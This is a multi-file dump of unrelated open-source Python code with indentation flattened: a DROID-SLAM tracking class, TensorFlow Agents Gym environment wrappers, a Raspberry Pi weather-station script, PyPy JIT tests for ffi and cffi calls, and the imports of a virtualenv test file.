def test_distributed():
start_workers(worker, 2, trace=True)
start_workers(worker, 2, trace=False)
|
droid.py | import torch
import lietorch
import numpy as np
from droid_net import DroidNet
from depth_video import DepthVideo
from motion_filter import MotionFilter
from droid_frontend import DroidFrontend
from droid_backend import DroidBackend
from trajectory_filler import PoseTrajectoryFiller
from collections import OrderedDict
from torch.multiprocessing import Process
class Droid:
def __init__(self, args):
super(Droid, self).__init__()
self.load_weights(args.weights)
self.args = args
self.disable_vis = args.disable_vis
# store images, depth, poses, intrinsics (shared between processes)
self.video = DepthVideo(args.image_size, args.buffer, stereo=args.stereo)
# filter incoming frames so that there is enough motion
self.filterx = MotionFilter(self.net, self.video, thresh=args.filter_thresh)
# frontend process
self.frontend = DroidFrontend(self.net, self.video, self.args)
# backend process
self.backend = DroidBackend(self.net, self.video, self.args)
# visualizer
if not self.disable_vis:
from visualization import droid_visualization
self.visualizer = Process(target=droid_visualization, args=(self.video,))
self.visualizer.start()
# post processor - fill in poses for non-keyframes
self.traj_filler = PoseTrajectoryFiller(self.net, self.video)
def load_weights(self, weights):
""" load trained model weights """
print(weights)
self.net = DroidNet()
state_dict = OrderedDict([
(k.replace("module.", ""), v) for (k, v) in torch.load(weights).items()])
state_dict["update.weight.2.weight"] = state_dict["update.weight.2.weight"][:2]
state_dict["update.weight.2.bias"] = state_dict["update.weight.2.bias"][:2]
state_dict["update.delta.2.weight"] = state_dict["update.delta.2.weight"][:2]
state_dict["update.delta.2.bias"] = state_dict["update.delta.2.bias"][:2]
self.net.load_state_dict(state_dict)
self.net.to("cuda:0").eval()
def track(self, tstamp, image, depth=None, intrinsics=None):
""" main thread - update map """
with torch.no_grad():
# check there is enough motion
self.filterx.track(tstamp, image, depth, intrinsics)
# local bundle adjustment
self.frontend()
# global bundle adjustment
# self.backend()
def terminate(self, stream=None):
""" terminate the visualization process, return poses [t, q] """
del self.frontend
torch.cuda.empty_cache()
print("#" * 32)
self.backend(7)
torch.cuda.empty_cache()
print("#" * 32)
self.backend(12)
camera_trajectory = self.traj_filler(stream)
return camera_trajectory.inv().data.cpu().numpy()
|
wrappers.py | # Copyright 2017 The TensorFlow Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for OpenAI Gym environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import multiprocessing
import sys
import traceback
import gym
import gym.spaces
import numpy as np
import tensorflow as tf
class AutoReset(object):
"""Automatically reset environment when the episode is done."""
def __init__(self, env):
self._env = env
self._done = True
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._done:
observ, reward, done, info = self._env.reset(), 0.0, False, {}
else:
observ, reward, done, info = self._env.step(action)
self._done = done
return observ, reward, done, info
def reset(self):
self._done = False
return self._env.reset()
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class RandomStart(object):
"""Perform random number of random actions at the start of the episode."""
def __init__(self, env, max_steps):
self._env = env
self._max_steps = max_steps
def __getattr__(self, name):
return getattr(self._env, name)
def reset(self):
observ = self._env.reset()
random_steps = np.random.randint(0, self._max_steps)
for _ in range(random_steps):
action = self._env.action_space.sample()
observ, unused_reward, done, unused_info = self._env.step(action)
if done:
tf.logging.warning('Episode ended during random start.')
return self.reset()
return observ
class FrameHistory(object):
"""Augment the observation with past observations."""
def __init__(self, env, past_indices, flatten):
"""Augment the observation with past observations.
Implemented as a Numpy ring buffer holding the necessary past observations.
Args:
env: OpenAI Gym environment to wrap.
past_indices: List of non-negative integers indicating the time offsets
from the current time step of observations to include.
flatten: Concatenate the past observations rather than stacking them.
Raises:
KeyError: The current observation is not included in the indices.
"""
if 0 not in past_indices:
raise KeyError('Past indices should include 0 for the current frame.')
self._env = env
self._past_indices = past_indices
self._step = 0
self._buffer = None
    # One slot is needed for every step from the oldest offset through the
    # current frame, hence max(past_indices) + 1.
    self._capacity = max(past_indices) + 1
self._flatten = flatten
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low = np.repeat(low[None, ...], len(self._past_indices), 0)
high = np.repeat(high[None, ...], len(self._past_indices), 0)
if self._flatten:
low = np.reshape(low, (-1,) + low.shape[2:])
high = np.reshape(high, (-1,) + high.shape[2:])
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
self._buffer[self._step % self._capacity] = observ
observ = self._select_frames()
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
self._buffer = np.repeat(observ[None, ...], self._capacity, 0)
self._step = 0
return self._select_frames()
def _select_frames(self):
indices = [(self._step - index) % self._capacity for index in self._past_indices]
observ = self._buffer[indices]
if self._flatten:
observ = np.reshape(observ, (-1,) + observ.shape[2:])
return observ
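# Illustrative sketch of FrameHistory's ring-buffer indexing (not used
# elsewhere), assuming past_indices=[0, 1] so the capacity is 2 and the slot
# written at each step is step % capacity.
def _frame_history_index_demo(step=5, capacity=2, past_indices=(0, 1)):
  # After step 5 the buffer holds steps 4 and 5; offsets 0 and 1 resolve to
  # slots [1, 0] respectively.
  return [(step - index) % capacity for index in past_indices]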
class FrameDelta(object):
"""Convert the observation to a difference from the previous observation."""
def __init__(self, env):
self._env = env
self._last = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low, high = low - high, high - low
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
delta = observ - self._last
self._last = observ
return delta, reward, done, info
def reset(self):
observ = self._env.reset()
self._last = observ
return observ
class RangeNormalize(object):
"""Normalize the specialized observation and action ranges to [-1, 1]."""
def __init__(self, env, observ=None, action=None):
self._env = env
self._should_normalize_observ = (observ is not False and
self._is_finite(self._env.observation_space))
if observ is True and not self._should_normalize_observ:
raise ValueError('Cannot normalize infinite observation range.')
if observ is None and not self._should_normalize_observ:
tf.logging.info('Not normalizing infinite observation range.')
self._should_normalize_action = (action is not False and
self._is_finite(self._env.action_space))
if action is True and not self._should_normalize_action:
raise ValueError('Cannot normalize infinite action range.')
if action is None and not self._should_normalize_action:
tf.logging.info('Not normalizing infinite action range.')
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
space = self._env.observation_space
if not self._should_normalize_observ:
return space
return gym.spaces.Box(-np.ones(space.shape), np.ones(space.shape))
@property
def action_space(self):
space = self._env.action_space
if not self._should_normalize_action:
return space
return gym.spaces.Box(-np.ones(space.shape), np.ones(space.shape))
def step(self, action):
if self._should_normalize_action:
action = self._denormalize_action(action)
observ, reward, done, info = self._env.step(action)
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ
def _denormalize_action(self, action):
min_ = self._env.action_space.low
max_ = self._env.action_space.high
action = (action + 1) / 2 * (max_ - min_) + min_
return action
def _normalize_observ(self, observ):
min_ = self._env.observation_space.low
max_ = self._env.observation_space.high
observ = 2 * (observ - min_) / (max_ - min_) - 1
return observ
def _is_finite(self, space):
return np.isfinite(space.low).all() and np.isfinite(space.high).all()
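# Illustrative sketch of RangeNormalize's affine maps (not used elsewhere),
# spelled out for a one-dimensional range [0, 10].
def _range_normalize_demo():
  low, high = 0.0, 10.0
  def denormalize(action):
    return (action + 1) / 2 * (high - low) + low
  def normalize(observ):
    return 2 * (observ - low) / (high - low) - 1
  assert [denormalize(a) for a in (-1.0, 0.0, 1.0)] == [0.0, 5.0, 10.0]
  assert normalize(denormalize(0.5)) == 0.5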
class ClipAction(object):
"""Clip out of range actions to the action space of the environment."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = self._env.action_space.shape
return gym.spaces.Box(-np.inf * np.ones(shape), np.inf * np.ones(shape))
def step(self, action):
action_space = self._env.action_space
action = np.clip(action, action_space.low, action_space.high)
return self._env.step(action)
class LimitDuration(object):
"""End episodes after specified number of steps."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ExternalProcess(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor):
"""Step environment in a separate process for lock free paralellism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
      KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception: # pylint: disable=broad-except
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
tf.logging.error('Error in environment process: {}'.format(stacktrace))
conn.send((self._EXCEPTION, stacktrace))
conn.close()
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
"""Convert data types of an OpenAI Gym environment to 32 bit.
Args:
env: OpenAI Gym environment.
"""
self._env = env
def __getattr__(self, name):
"""Forward unimplemented attributes to the original environment.
Args:
name: Attribute that was accessed.
Returns:
Value behind the attribute name in the wrapped environment.
"""
return getattr(self._env, name)
def step(self, action):
"""Forward action to the wrapped environment.
Args:
action: Action to apply to the environment.
Raises:
ValueError: Invalid action.
Returns:
Converted observation, converted reward, done flag, and info object.
"""
observ, reward, done, info = self._env.step(action)
observ = self._convert_observ(observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
"""Reset the environment and convert the resulting observation.
Returns:
Converted observation.
"""
observ = self._env.reset()
observ = self._convert_observ(observ)
return observ
def _convert_observ(self, observ):
"""Convert the observation to 32 bits.
Args:
observ: Numpy observation.
Raises:
ValueError: Observation contains infinite values.
Returns:
Numpy observation with 32-bit data type.
"""
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
"""Convert the reward to 32 bits.
Args:
reward: Numpy reward.
Raises:
ValueError: Rewards contain infinite values.
Returns:
Numpy reward with 32-bit data type.
"""
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
|
main_processes.py | #!/usr/bin/env python
from multiprocessing import Manager, Process
from datetime import datetime
import time
import warnings
import progressbar
import touchphat
from pilconvert import palette_convert
from tpf_60 import sensing
from plot_graphs import plot_graph
from inky_write import show_image
from stat_calc import calc_statistics
from speak_information import speak_info, speak_full_info
@touchphat.on_touch("A")
def handle_a():
global speak_values
speak_values = True
@touchphat.on_touch("B")
def handle_b():
global speak_all_values
speak_all_values = True
class Weather:
def __init__(self, image_file=None, screen_polling_time=60, sleep_time=1, data_polling_time=1, data_limit=60, data_timeout=None):
manager = Manager()
self.temperature_data = manager.list()
self.pressure_data = manager.list()
self.humidity_data = manager.list()
self.temperature_statistics = manager.dict()
self.pressure_statistics = manager.dict()
self.humidity_statistics = manager.dict()
self.calculate_condition = manager.Condition()
self.image_file = image_file
self.data_polling = data_polling_time
self.data_timeout = data_timeout
self.data_limit = data_limit
if screen_polling_time < 20:
raise ValueError("Polling time cannot be less 20s, the refresh rate of the screen.")
if data_polling_time > screen_polling_time:
raise ValueError("Data must be polled at least once per screen refresh.")
if screen_polling_time/data_polling_time > 60:
UserWarning("Data will show the last {} seconds, but only be polled every {} seconds.".format(data_polling_time * 60, screen_polling_time))
if screen_polling_time/data_polling_time > 180:
raise ValueError("Too much data will be lost in between screen refreshes (120+ data points).")
self.polling_time = screen_polling_time
if sleep_time > 60:
UserWarning("Sleeping longer than 60s will mean that the screen updates less than once per minute.")
self.sleep_time = sleep_time
def run(self):
global speak_values
global speak_all_values
sensor = Process(target=sensing, args=(self.temperature_data, self.pressure_data, self.humidity_data, self.data_polling, self.data_limit, self.data_timeout, self.calculate_condition), daemon=True)
sensor.start()
calc_stat = Process(target=calc_statistics, kwargs=dict(temperature_data=self.temperature_data,
temperature_statistics=self.temperature_statistics,
pressure_data=self.pressure_data,
pressure_statistics=self.pressure_statistics,
humidity_data=self.humidity_data,
humidity_statistics=self.humidity_statistics,
condition_flag=self.calculate_condition), daemon=True)
calc_stat.start()
time_mark = datetime.now()
bar = progressbar.ProgressBar(widgets=["Polling: ", progressbar.AnimatedMarker()], max_value=progressbar.UnknownLength)
while True:
if speak_values:
speak_values = False
spk_info = Process(target=speak_info, kwargs=dict(temperature_data=self.temperature_data,
pressure_data=self.pressure_data,
humidity_data=self.humidity_data), daemon=True)
spk_info.start()
elif speak_all_values:
speak_all_values = False
spk_all_info = Process(target=speak_full_info, kwargs=dict(temperature_data=self.temperature_data,
temperature_statistics=self.temperature_statistics,
pressure_data=self.pressure_data,
pressure_statistics=self.pressure_statistics,
humidity_data=self.humidity_data,
humidity_statistics=self.humidity_statistics,
data_polling=self.data_polling), daemon=True)
spk_all_info.start()
date_delta = datetime.now() - time_mark
if date_delta.total_seconds() >= self.polling_time:
bar.finish()
time_mark = datetime.now()
print(time_mark)
cur_info = "Latest: {0:.2f} F,{1:.2f} hPa,{2:.3f} %RH".format(self.temperature_data[-1],
self.pressure_data[-1],
self.humidity_data[-1])
print(cur_info)
plot_graph(self.temperature_data, self.pressure_data, self.humidity_data, self.image_file)
palette_convert(self.image_file)
inky_show = Process(target=show_image, args=(self.image_file, self.temperature_data,
self.pressure_data, self.humidity_data), daemon=True)
inky_show.start()
bar.start()
else:
bar.update(date_delta.total_seconds())
time.sleep(self.sleep_time)
if __name__ == "__main__":
speak_values = False
speak_all_values = False
while True:
try:
long_short = input("Short (1), long (2), or day-long (3) [default: 1]?")
if long_short == "1" or long_short == "":
dt_polling_time = 1
scr_polling_time = 60
dt_limit = 60
break
elif long_short == "2":
dt_polling_time = 60
scr_polling_time = 60
dt_limit = 60
elif long_short == "3":
dt_polling_time = 60
scr_polling_time = 60
dt_limit = 1440
break
else:
print("Select 1, 2, or 3.")
except KeyboardInterrupt:
raise SystemExit(0)
w = Weather(image_file="test.png", data_polling_time=dt_polling_time, screen_polling_time=scr_polling_time, sleep_time=1, data_limit=dt_limit)
w.run()
|
test_ffi.py | import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
def test__ffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
i = 0
res = 0
while i < 300:
tmp = pow(2, 3) # ID: fficall
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
if 'ConstClass(pow)' in repr(loop): # e.g. OS/X
pow_addr = 'ConstClass(pow)'
assert loop.match_by_id('fficall', """
guard_not_invalidated(descr=...)
i17 = force_token()
setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""" % pow_addr)
def test__ffi_call_frame_does_not_escape(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
def mypow(a, b):
return pow(a, b)
i = 0
res = 0
while i < 300:
tmp = mypow(2, 3)
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
opnames = log.opnames(loop.allops())
# we only force the virtualref, not its content
assert opnames.count('new_with_vtable') == 1
def test__ffi_call_releases_gil(self):
from rpython.rlib.clibffi import get_libc_name
def main(libc_name, n):
import time
import os
from threading import Thread
#
if os.name == 'nt':
from _rawffi.alt import WinDLL, types
libc = WinDLL('Kernel32.dll')
sleep = libc.getfunc('Sleep', [types.uint], types.uint)
delays = [0]*n + [1000]
else:
from _rawffi.alt import CDLL, types
libc = CDLL(libc_name)
sleep = libc.getfunc('sleep', [types.uint], types.uint)
delays = [0]*n + [1]
#
def loop_of_sleeps(i, delays):
for delay in delays:
sleep(delay) # ID: sleep
#
threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
start = time.time()
for i, thread in enumerate(threads):
thread.start()
for thread in threads:
thread.join()
end = time.time()
return end - start
log = self.run(main, [get_libc_name(), 200], threshold=150,
import_site=True)
assert 1 <= log.result <= 1.5 # at most 0.5 seconds of overhead
loops = log.loops_by_id('sleep')
assert len(loops) == 1 # make sure that we actually JITted the loop
def test__ffi_struct(self):
def main():
from _rawffi.alt import _StructDescr, Field, types
fields = [
Field('x', types.slong),
]
descr = _StructDescr('foo', fields)
struct = descr.allocate()
i = 0
while i < 300:
x = struct.getfield('x') # ID: getfield
x = x+1
struct.setfield('x', x) # ID: setfield
i += 1
return struct.getfield('x')
#
log = self.run(main, [])
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('getfield', """
guard_not_invalidated(descr=...)
i57 = getfield_raw_i(i46, descr=<FieldS dynamic 0>)
""")
assert loop.match_by_id('setfield', """
setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
""")
def test__cffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BInt = _cffi_backend.new_primitive_type("int")
BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
ldexp = libm.load_function(BPow, 'ldexp')
i = 0
res = 0
while i < 300:
tmp = ldexp(1, 3) # ID: cfficall
res += tmp
i += 1
BLong = _cffi_backend.new_primitive_type("long")
ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
return ldexp_addr, res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
ldexp_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
f97 = call_release_gil_f(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test__cffi_call_c_int(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BClose = _cffi_backend.new_function_type([BInt], BInt)
_dup = libc.load_function(BClose, 'dup')
i = 0
fd0, fd1 = os.pipe()
while i < 300:
tmp = _dup(fd0) # ID: cfficall
os.close(tmp)
i += 1
os.close(fd0)
os.close(fd1)
BLong = _cffi_backend.new_primitive_type("long")
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
if sys.maxint > 2**32:
extra = "i98 = int_signext(i97, 4)"
else:
extra = ""
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i50, descr=<Calli 4 i EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
%s
""" % extra, ignore_ops=['guard_not_invalidated'])
def test__cffi_call_size_t(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BSizeT = _cffi_backend.new_primitive_type("size_t")
BChar = _cffi_backend.new_primitive_type("char")
BCharP = _cffi_backend.new_pointer_type(BChar)
BWrite = _cffi_backend.new_function_type([BInt, BCharP, BSizeT],
BSizeT) # not signed here!
_write = libc.load_function(BWrite, 'write')
i = 0
fd0, fd1 = os.pipe()
buffer = _cffi_backend.newp(BCharP, b'A')
while i < 300:
tmp = _write(fd1, buffer, 1) # ID: cfficall
assert tmp == 1
assert os.read(fd0, 2) == b'A'
i += 1
os.close(fd0)
os.close(fd1)
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i10, i12, 1, descr=<Calli . iii EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
p98 = call_r(ConstClass(fromrarith_int__r_uint), i97, descr=<Callr . i EF=4>)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test_cffi_call_guard_not_forced_fails(self):
# this is the test_pypy_c equivalent of
# rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
#
# it requires cffi to be installed for pypy in order to run
def main():
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
typedef void (*functype)(int);
int foo(int n, functype func);
""")
lib = ffi.verify("""
#include <signal.h>
typedef void (*functype)(int);
int foo(int n, functype func) {
if (n >= 2000) {
func(n);
}
return n*2;
}
""")
@ffi.callback("functype")
def mycallback(n):
if n < 5000:
return
# make sure that guard_not_forced fails
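# (walking the frame chain and reading f_locals forces PyPy's
# virtualizable frames, so guard_not_forced in the trace must fail)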
d = {}
f = sys._getframe()
while f:
d.update(f.f_locals)
f = f.f_back
n = 0
while n < 10000:
res = lib.foo(n, mycallback) # ID: cfficall
# this is the real point of the test: before the
# refactor-call_release_gil branch, the assert failed when
# res == 5000
assert res == n*2
n += 1
return n
log = self.run(main, [], import_site=True,
discard_stdout_before_last_line=True) # <- for Win32
assert log.result == 10000
loop, = log.loops_by_id('cfficall')
assert loop.match_by_id('cfficall', """
...
i1 = call_release_gil_i(..., descr=<Calli 4 ii EF=7 OS=62>)
...
""")
def test__cffi_bug1(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BSin = _cffi_backend.new_function_type([BDouble], BDouble)
sin = libm.load_function(BSin, 'sin')
def f(*args):
for i in range(300):
sin(*args)
f(1.0)
f(1)
#
libm_name = get_libm_name(sys.platform)
self.run(main, [libm_name])
# assert did not crash
def test_cffi_init_struct_with_list(self):
def main(n):
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
struct s {
short x;
short y;
short z;
};
""")
for i in range(n):
ffi.new("struct s *", [i, i, i])
log = self.run(main, [300])
loop, = log.loops_by_filename(self.filepath)
assert loop.match("""
i106 = getfield_gc_i(p20, descr=...)
i161 = int_lt(i106, i43)
guard_true(i161, descr=...)
i162 = int_add(i106, 1)
p110 = getfield_gc_r(p16, descr=...)
setfield_gc(p20, i162, descr=...)
guard_value(p110, ConstPtr(ptr111), descr=...)
guard_not_invalidated(descr=...)
p163 = force_token()
p164 = force_token()
p118 = getfield_gc_r(p16, descr=...)
p120 = getarrayitem_gc_r(p118, 0, descr=...)
guard_value(p120, ConstPtr(ptr121), descr=...)
p122 = getfield_gc_r(p120, descr=...)
guard_value(p122, ConstPtr(ptr123), descr=...)
p125 = getfield_gc_r(p16, descr=...)
guard_nonnull_class(p125, ..., descr=...)
p999 = getfield_gc_r(p125, descr=...)
guard_isnull(p999, descr=...)
p127 = getfield_gc_r(p125, descr=...)
guard_value(p127, ConstPtr(ptr128), descr=...)
p129 = getfield_gc_r(p127, descr=...)
guard_value(p129, ConstPtr(ptr130), descr=...)
p132 = call_r(ConstClass(_ll_0_alloc_with_del___), descr=...)
guard_no_exception(descr=...)
p133 = force_token()
p134 = new_with_vtable(descr=...)
setfield_gc(p134, ..., descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
setfield_gc(p48, p134, descr=...)
setfield_gc(p132, ..., descr=...)
i138 = call_i(ConstClass(_ll_1_raw_malloc_varsize_zero__Signed), 6, descr=...)
check_memory_error(i138)
setfield_gc(p132, i138, descr=...)
setfield_gc(p132, 0, descr=...)
setfield_gc(p132, ConstPtr(ptr139), descr=...)
setfield_gc(p132, -1, descr=...)
setfield_gc(p0, p133, descr=...)
call_may_force_n(ConstClass(_ll_2_gc_add_memory_pressure__Signed_pypy_module__cffi_backend_cdataobj_W_CDataNewStdPtr), 6, p132, descr=...)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
i144 = int_add(i138, 0)
i146 = int_signext(i106, 2)
i147 = int_ne(i106, i146)
guard_false(i147, descr=...)
setarrayitem_raw(i144, 0, i106, descr=...)
i150 = int_add(i138, 2)
setarrayitem_raw(i150, 0, i106, descr=...)
i153 = int_add(i138, 4)
setarrayitem_raw(i153, 0, i106, descr=...)
p156 = getfield_gc_r(p48, descr=...)
i158 = getfield_raw_i(..., descr=...)
setfield_gc(p48, p49, descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
i159 = int_lt(i158, 0)
guard_false(i159, descr=...)
jump(..., descr=...)
""")
|
test_creator.py | from __future__ import absolute_import, unicode_literals
import difflib
import gc
import json
import logging
import os
import shutil
import stat
import subprocess
import sys
import zipfile
from collections import OrderedDict
from itertools import product
from stat import S_IREAD, S_IRGRP, S_IROTH
from textwrap import dedent
from threading import Thread
import pytest
from virtualenv.__main__ import run, run_with_catch
